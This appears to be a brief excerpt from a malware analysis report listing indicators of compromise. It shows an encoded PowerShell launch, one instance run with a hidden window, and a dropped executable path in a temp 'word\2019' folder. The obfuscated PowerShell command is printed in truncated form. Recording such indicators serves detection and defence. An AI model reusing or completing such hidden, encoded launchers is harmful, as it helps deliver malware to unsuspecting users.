Technical information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABBADYAbgBqAHEAdAA0AD0AKAAnAFQAbQAnACsAKAAnAGcAJwArACcANgBlACcAKQArACcAdQBoACcAKQA7AC4AKAAnAG4AZQB3ACcAKwAnAC0AaQB0AGUAbQAnACkAIAAkAGUATgB2ADoAVABlAE0AcABcAHcATwBSAEQAXAAyADAAMQA5AFwAIAAtAG...
- %TEMP%\word\2019\t6l_wggw8.exe
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABBADYAbgBqAHEAdAA0AD0AKAAnAFQAbQAnACsAKAAnAGcAJwArACcANgBlACcAKQArACcAdQBoACcAKQA7AC4AKAAnAG4AZQB3ACcAKwAnAC0AaQB0AGUAbQAnACkAIAAkAGUATgB2ADoAVABlAE0AcABcAHcATwBSAEQAXAAyADAAMQA5AFwAIAAtAG...' (with hidden window)